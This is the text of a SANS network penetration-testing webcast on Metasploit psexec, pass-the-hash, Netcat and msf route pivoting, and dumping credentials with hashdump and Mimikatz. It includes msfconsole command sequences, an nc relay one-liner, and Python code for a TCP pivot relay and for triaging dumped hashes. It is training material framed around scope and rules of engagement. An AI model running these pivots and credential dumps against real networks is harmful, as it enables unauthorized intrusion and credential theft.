
A Taste Of SEC560 Webcast - SANS Institute


SEC560: Network Pen Testing & Ethical Hacking © SANS, All Rights Reserved

SANS Security 560: Network Penetration Testing and Ethical Hacking

A Taste of SANS SEC 560: Adventures in High-Value Pen Testing

Copyright 2015, All Rights Reserved. Version 2Q15

Slide 3: Ed Skoudis

ed.skoudis

04/06/2015

• Ed Skoudis introduces himself as:
  – A penetration tester and incident handler
  – A SANS Instructor
  – A course author: SANS SEC504 & SEC560
  – The SANS Pen Test Curriculum Lead
  – Director of the NetWars & CyberCity projects

Slide 5: SEC 560 Course Outline

• 560.1: Comprehensive Planning, Scoping, and Recon
• 560.2: In-Depth Scanning
• 560.3: Exploitation & Post Exploitation
• 560.4: Password Attacks & Merciless Pivoting
• 560.5: Wireless and Web Apps
• 560.6: Full-Day Pen Test Lab and Capture the Flag Contest

Slide 6: About the SANS SEC 560 Course

• Our focus is on helping you master the skills needed for hands-on network penetration testing and ethical hacking
  – Organized around the workflow of professional testers
  – Numerous hands-on labs, culminating in a full-day end-to-end penetration test in 560.6
  – Tips for avoiding common pitfalls and saving time, to make the tester more efficient and the test safer

Slide 7: A Formal Penetration Testing Definition

• Penetration testing involves modeling the techniques used by real-world computer attackers...
  – To find vulnerabilities...
  – And, under controlled circumstances, to exploit those flaws...
  – In a professional, safe manner according to a carefully designed scope and rules of engagement...
  – To determine business risk and potential impact...
  ...all with the goal of helping the organization improve its security practices

Slide 8: Why Exploitation?

• False positive reduction / elimination
  – But, even if an exploit doesn't work, you may still want to report the detected vulnerability
• Proof of vulnerability, and therefore a more realistic treatment of risk
• Use of one machine as a pivot point to get deeper inside the network
  – More of a sense of what a real bad guy can accomplish
• Exploitation leads to post-exploitation...
  – ...which really helps us understand the business risks that the target organization faces due to discovered vulnerabilities

[Diagram: the attacker passes through a firewall to a DMZ system, then pivots from it to an internal system]

Slide 9: Risks of Exploitation

• Service crash
• System crash
• System stability impacted
• System integrity violated
• Data exposure with legal ramifications
  – As a penetration tester, you likely do not want to be in possession of millions of credit card numbers or other similarly sensitive information
• Inadvertently accessing the wrong system
  – Out of scope, or even the wrong target organization
• Because of these concerns, verify that exploitation is allowed by the Rules of Engagement
  – And double-check, for each given system, whether it is in scope
• Also, understand the probabilistic nature of exploit success
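The "double-check whether it is in scope" step from the bullets above, as an added example that is not part of the SANS slides. It checks a candidate RHOST against the in-scope ranges and the explicit exclusions from the Rules of Engagement before you type `set RHOST` in msfconsole; exclusions win over inclusions, and anything that is not an IP literal (a hostname, a typo) is rejected rather than silently passed. The ranges are constructed sample data and the function names are mine.

```python
"""Scope guard for exploitation targets (added example, not SANS course code).

Constructed sample scope: two in-scope entries and two exclusions. An excluded
host inside an in-scope /24 stays off-limits, which is the usual RoE shape
("the whole DMZ except the payment gateway").
"""
import ipaddress

IN_SCOPE = ["10.10.10.0/24", "10.10.75.1"]        # constructed
EXCLUDED = ["10.10.10.50", "10.10.10.64/27"]      # constructed


def _networks(entries):
    # strict=False lets both CIDR blocks and single-host entries parse.
    return [ipaddress.ip_network(e, strict=False) for e in entries]


def in_scope(target, in_scope=IN_SCOPE, excluded=EXCLUDED):
    """True only if target is inside an in-scope range and not inside any exclusion.

    Raises ValueError for anything that is not an IP literal, so a hostname
    or a typo never counts as 'in scope' by accident.
    """
    ip = ipaddress.ip_address(target)
    if any(ip in net for net in _networks(excluded)):
        return False
    return any(ip in net for net in _networks(in_scope))


def check_targets(targets, in_scope=IN_SCOPE, excluded=EXCLUDED):
    """Classify candidate RHOSTs: 'ok', 'excluded', 'out-of-scope' or 'invalid'."""
    verdicts = {}
    for t in targets:
        try:
            ip = ipaddress.ip_address(t)
        except ValueError:
            verdicts[t] = "invalid"
            continue
        if any(ip in net for net in _networks(excluded)):
            verdicts[t] = "excluded"
        elif any(ip in net for net in _networks(in_scope)):
            verdicts[t] = "ok"
        else:
            verdicts[t] = "out-of-scope"
    return verdicts


if __name__ == "__main__":
    candidates = ["10.10.10.10", "10.10.10.50", "10.10.10.70", "10.10.11.5", "dc01"]
    for host, verdict in check_targets(candidates).items():
        print(f"{host:15} {verdict}")
```

Only hosts reported as "ok" get an exploit pointed at them; "excluded" and "out-of-scope" are both hard stops, and "invalid" means resolve the name yourself and check the resulting address, since a hostname can resolve to an address outside the engagement.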

Slide 10: The Metasploit Arsenal

• Metasploit divides up the concepts of exploits, payloads, auxiliary modules, and post modules
  – An exploit takes advantage of a flaw in a target program
  – The payload makes the target do something the attacker wants
  – Auxiliary modules perform all kinds of tasks, including scanning
  – A post module is used in post-exploitation to plunder targets or manipulate them

[Diagram: from the User Interface you choose an exploit from the Exploit Collection (Exploit 1, Exploit 2, ... Exploit N) and a payload from the Payload Collection (Payload 1, Payload 2, ... Payload M); the Launcher pairs them (for example Exploit 2 + Payload 1) and sends the result to the target. The Auxiliary Modules (Aux 1 ... Aux N) and Post Modules (Post 1 ... Post N) are separate collections alongside these.]

Slide 11: Metasploit psexec Module

• Metasploit includes a fantastic psexec module
  – It's an exploit module, although it is not really exploiting a specific vulnerability: it uses legitimate Windows remote-administration functionality with valid admin credentials
  – Establishes an SMB session with the target RHOST using a provided admin-level SMBUser and SMBPass, causing the target to run a specified Metasploit payload
• Writes an executable into the target file system (uploaded via the ADMIN$ share), creates a service with a pseudo-random name, runs the payload with local SYSTEM privileges, and then automatically removes the executable and service, cleaning up after itself
  – Select it at msfconsole using: msf > use exploit/windows/smb/psexec
  – Also supports pass-the-hash, authenticating to the target via an admin username and hash (set SMBPass to the LM:NT hash pair instead of a password)
  – This module IS ONE OF THE MOST USEFUL IN ALL OF METASPLOIT, especially in a well-patched Windows internal network environment, where there may be no unpatched flaw to exploit but you do hold admin credentials or hashes

Slide 12: Psexec & the Pen Tester's Pledge

Slide 13: Meterpreter Functionality: Pivoting using Metasploit's Route Command

• Metasploit includes a "route" command to pivot through an already-exploited host via a Meterpreter session
  – Carries follow-on exploits and payloads across the Meterpreter session
  – Don't confuse this with the Meterpreter "route" command, which manages routing tables on a compromised system running Meterpreter
  – The msf route covers the connections Metasploit itself opens toward the routed subnet (the exploit traffic); a reverse-connect payload on the second victim still needs a path back to your LHOST, so check that one exists (in the lab below, the new session comes back over TCP 443)

msf > use [exploit1]
msf > set RHOST [victim1]
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > exploit
meterpreter > (press CTRL-Z to background the session; Metasploit displays the Meterpreter session ID, sid)
msf > route add [victim2_subnet] [netmask] [sid]
msf > use [exploit2]
msf > set RHOST [victim2]
msf > set PAYLOAD [payload2]
msf > exploit

[Diagram: the Pen Tester sends Exploit1 to Victim1 and obtains a Meterpreter session; Exploit2 and Payload2 then travel through that session to Victim2]

Slide 14: Sending SMB Through a Netcat Relay to Pivot through Linux

[Diagram: Attacker (SMB client) -> Linux Relay Machine (nc listener piped into nc client) -> Target Windows at 10.10.10.10 (SMB service)]

On the attacker, the SMB client is pointed at the relay rather than at the target:

C:\> net use \\Linux\c$ [password] /u:[user]

On the Linux relay machine, a named pipe carries the return traffic so the two Netcats form a bidirectional relay (listener stdout feeds the client, client stdout goes through tee back into the listener's stdin):

# mknod backpipe p
# nc -l -p 445 0<backpipe | nc 10.10.10.10 445 | tee backpipe

Then, through the relay: mount the share, run psexec, grab hashes, etc.

Note that this nc listener serves a single connection and exits when it closes, so restart it (or wrap it in a loop) before each new connection you send through the pivot.
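The Netcat relay above, reimplemented as a small bidirectional TCP relay. This is an added example, not code from the SANS slides: it does what the `mknod backpipe p; nc -l -p 445 0<backpipe | nc 10.10.10.10 445 | tee backpipe` pair does, copying bytes in both directions between whoever connects to the listening port and the target. The listen/target addresses in the comments are placeholders, and the echo server is a constructed stand-in for the Windows SMB service so the round trip can be exercised offline. Unlike the single `nc -l`, this relay keeps accepting connections, so a failed SMB attempt does not take the pivot down with it.

```python
"""Bidirectional TCP relay for pivoting (added example, not SANS course code)."""
import socket
import threading


def _pump(src, dst):
    """Copy bytes src -> dst until src closes, then half-close dst."""
    try:
        while True:
            data = src.recv(65536)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def _handle(client, target):
    """Connect to the target and splice the two sockets together (one thread per direction)."""
    try:
        upstream = socket.create_connection(target, timeout=10)
    except OSError:
        client.close()        # target unreachable: drop the client, keep the relay alive
        return
    upstream.settimeout(None)
    t1 = threading.Thread(target=_pump, args=(client, upstream), daemon=True)
    t2 = threading.Thread(target=_pump, args=(upstream, client), daemon=True)
    t1.start(); t2.start()
    t1.join(); t2.join()
    client.close()
    upstream.close()


def start_relay(listen_host, listen_port, target_host, target_port):
    """Start the relay in a background thread; return (listening socket, bound port)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((listen_host, listen_port))
    srv.listen(16)

    def accept_loop():
        while True:
            try:
                client, _ = srv.accept()
            except OSError:   # listening socket closed: relay shut down
                return
            threading.Thread(target=_handle, args=(client, (target_host, target_port)),
                             daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv, srv.getsockname()[1]


def start_echo_server(host="127.0.0.1"):
    """Constructed stand-in for the target service: echoes whatever it receives."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))
    srv.listen(4)

    def serve():
        while True:
            try:
                c, _ = srv.accept()
            except OSError:
                return
            threading.Thread(target=_pump, args=(c, c), daemon=True).start()

    threading.Thread(target=serve, daemon=True).start()
    return srv, srv.getsockname()[1]


def relay_roundtrip(payload: bytes) -> bytes:
    """client -> relay -> echo server -> relay -> client; returns what the client got back."""
    echo, echo_port = start_echo_server()
    relay, relay_port = start_relay("127.0.0.1", 0, "127.0.0.1", echo_port)
    try:
        with socket.create_connection(("127.0.0.1", relay_port), timeout=5) as c:
            c.sendall(payload)
            c.shutdown(socket.SHUT_WR)
            out = b""
            while chunk := c.recv(65536):
                out += chunk
            return out
    finally:
        relay.close()
        echo.close()


if __name__ == "__main__":
    # On a real pivot (placeholder addresses): start_relay("0.0.0.0", 4545, "10.10.10.10", 445)
    # and then point SMB / psexec at the pivot's port 4545 from the attacking box.
    print(relay_roundtrip(b"hello through the pivot"))
```

The relay is transparent to the protocol, which is why SMB, psexec and the Meterpreter stage all pass through it unchanged; what it does not do is rewrite addresses, so the target sees the pivot host, not you, as the client.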

Slide 15: Dumping Authentication Information from Memory with Mimikatz

• Mimikatz was created by Benjamin Delpy (also known as gentilkiwi)
• Pulls authentication information from memory on a Windows machine
  – Searches through LSASS memory at various specific locations, looking for password hashes and ***clear-text passwords***
  – Reading LSASS requires SYSTEM or debug privileges, which the SYSTEM-level session that psexec delivers provides
• Originally a separate executable (mimikatz.exe) to load on a target machine and run
• Now it is also a Metasploit Meterpreter extension, loaded into an existing session with "load mimikatz"

Slide 16: Course Roadmap

• Planning and Recon
• Scanning
• Exploitation & Post-Exploitation
• Password Attacks
  – Motivation and Defs
  – Password Attack Tips
  – Account Lockout
  – Password Guessing with THC-Hydra
    Lab: Hydra
  – Password Representation Formats
  – Obtaining Hashes
    Lab: Fgdump & Netcat Pivot Hashdump
  – More Hash Dumping Options
    Lab: Msf psexec & Mimikatz
  – John the Ripper
    Lab: John the Ripper
  – Cain
    Lab: Cain
  – Rainbow Table Attacks
    Lab: Ophcrack
  – Pass-the-Hash Attacks
    Lab: Pass-the-Hash
• Wireless Attacks
• Web App Attacks

Slide 17: Using MSF psexec, a Netcat relay, Meterpreter, & hashdump

[Diagram of the lab network:
  Your Linux (Metasploit, psexec module) --TCP 4545--> Compromised Linux DMZ Target, 10.10.75.1 (nc listener piped into nc client) --TCP 445--> Target 1 Windows, 10.10.10.10 (SMB services)
  The Meterpreter session from Target 1 connects back to Your Linux over TCP 80; hashdump runs inside it
  Target 2 Windows, 10.10.10.20 (SMB services on TCP 445), is reachable only from the 10.10.10 network]

Slide 18: Launching Metasploit and Choosing psexec Module

Slide 19: Configuring Metasploit (1)

Slide 20: Configuring Metasploit (2)

[Diagram: Your Linux (Metasploit, psexec) --TCP 4545--> Linux Target 10.10.75.1 (nc | nc) --TCP 445--> Windows 10.10.10.10 (SMB); Meterpreter returns over TCP 80. psexec is therefore aimed at the relay, 10.10.75.1 port 4545, and the relay delivers the SMB traffic to the Windows target.]

Slide 21: Preparing the Relay & Exploiting

Look at the details of this session's connection, between 10.10.10.10 and your Linux box.

[Diagram: same topology: Your Linux (Metasploit, psexec) --TCP 4545--> Linux Target 10.10.75.1 (nc | nc) --TCP 445--> Windows 10.10.10.10 (SMB); the Meterpreter session comes back over TCP 80]

Slide 22: Dumping the Hashes

Note that "run hashdump" can also dump Windows password hints that users create, if they are present.
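Once hashdump has produced its user:rid:LM:NT::: lines, a tester wants three things before moving on to cracking or pass-the-hash: which accounts still carry an LM hash (legacy and trivially cracked), which have an empty password, and which accounts share an NT hash (one crack or one pass-the-hash credential reaches all of them). The triage below is an added example, not code from the SANS slides. The sample dump is constructed; the two sentinel values are the well-known constants for an empty LM slot (LM disabled) and for the NT hash of an empty password, and 8846f7eaee8fb117ad06bdd830b7586c is the NT hash of "password". Lines Metasploit prefixes with "[" (status output, password hints) are skipped.

```python
"""Triage for Meterpreter hashdump / pwdump-format output (added example, not SANS course code)."""
from collections import defaultdict

LM_EMPTY = "aad3b435b51404eeaad3b435b51404ee"   # LM hash slot when LM is disabled / empty
NT_EMPTY = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty password

# Constructed sample dump, shaped like 'run hashdump' output.
SAMPLE_DUMP = """\
[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5835048ce94ad0564e29a924a03510ef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
jsmith:1002:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
"""


def parse_hashdump(text):
    """Parse pwdump-style lines into dicts; skip blank lines and '[...]' status lines."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("["):
            continue
        parts = line.split(":")
        if len(parts) < 4:
            raise ValueError(f"not a pwdump line: {line!r}")
        user, rid, lm, nt = parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()
        if len(lm) != 32 or len(nt) != 32:
            raise ValueError(f"bad hash length in: {line!r}")
        entries.append({"user": user, "rid": rid, "lm": lm, "nt": nt})
    return entries


def triage(entries):
    """Flag LM-present accounts, empty passwords, NT-hash reuse, and build pass-the-hash strings."""
    lm_present = [e["user"] for e in entries if e["lm"] != LM_EMPTY]
    empty_password = [e["user"] for e in entries if e["nt"] == NT_EMPTY]
    by_nt = defaultdict(list)
    for e in entries:
        if e["nt"] != NT_EMPTY:
            by_nt[e["nt"]].append(e["user"])
    nt_reuse = {nt: users for nt, users in by_nt.items() if len(users) > 1}
    # psexec's SMBPass accepts "LM:NT"; the empty-LM sentinel fills the LM slot when LM is absent.
    pth = {e["user"]: f"{e['lm']}:{e['nt']}" for e in entries if e["nt"] != NT_EMPTY}
    return {"lm_present": lm_present, "empty_password": empty_password,
            "nt_reuse": nt_reuse, "pth": pth}


if __name__ == "__main__":
    findings = triage(parse_hashdump(SAMPLE_DUMP))
    print("LM hash present   :", findings["lm_present"])
    print("Empty password    :", findings["empty_password"])
    print("NT hash reuse     :", findings["nt_reuse"])
    for user, cred in findings["pth"].items():
        print(f"pass-the-hash {user:14} SMBPass={cred}")
```

The reuse groups are the interesting output for the pivot in the next slides: if a local account on 10.10.10.10 shares its NT hash with an account on 10.10.10.20, that hash is the SMBPass for psexec against the second host without any cracking.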

Slide 23: Using msf route to Pivot and Mimikatz

• Let's use the msf route command to pivot across our Meterpreter session on 10.10.10.10 to attack 10.10.10.20
  – Getting Meterpreter on 10.10.10.20, and then loading Mimikatz

[Diagram: Your Linux (Metasploit) holds the existing Meterpreter session over TCP 80 from DMZ Target 10.10.10.10 (Windows, SMB services). An msf route pivots SMB through 10.10.10.10 for psexec on DMZ Target 10.10.10.20 (Windows, SMB services), whose TCP 445 is allowed only from the 10.10.10 net. The new Meterpreter session from 10.10.10.20 comes back over TCP 443; there we load Mimikatz and dump hashes & passwords. The compromised Linux DMZ Target 10.10.75.1 is the relay from the first part of the lab.]

Slide 24: Background Session & Prepare to Attack 10.10.10.20

[Diagram: same topology: existing Meterpreter session over TCP 80 from 10.10.10.10; msf route pivots SMB (TCP 445) through 10.10.10.10 for psexec on 10.10.10.20; new Meterpreter session from 10.10.10.20 over TCP 443; Linux Target 10.10.75.1]

Slide 25: Exploit 10.10.10.20 through Pivot

Don't worry about the "Exploit failed" warning. As long as you see "Session N created"... it worked. As long as you see the "meterpreter >" prompt, it worked.

Slide 26: Get System Info

Our session is with 10.10.10.20!

[Diagram: Your Linux (Metasploit) with the existing Meterpreter session over TCP 80 from 10.10.10.10 and the new Meterpreter session over TCP 443 from 10.10.10.20, where we load Mimikatz and dump hashes & passwords]

Slide 27: Load Mimikatz and Dump Passwords

Clear-text password below!

Slide 28: Exiting & Lab Conclusions

• In this lab, we've seen how to use Metasploit's psexec module to deliver a Meterpreter payload through a Netcat relay so that we can dump hashes
• And we've seen how we can use a Metasploit route to pivot through a target machine to load Mimikatz and dump clear-text passwords

Slide 29: Webcast Conclusions

• Pen testing can help a target organization better understand its risk posture and manage risks
• Penetration testers can take advantage of plentiful tools and techniques in our work:
  – Metasploit and the Meterpreter
  – Psexec for code execution via SMB
  – Netcat relays and msfconsole route for pivots
  – Hashdump and Mimikatz for credentials
• Know your tools in depth, and never lose your focus on providing as much business value as you can in your penetration test!

It's not the weapon that's important. It's the Ninja wielding it.
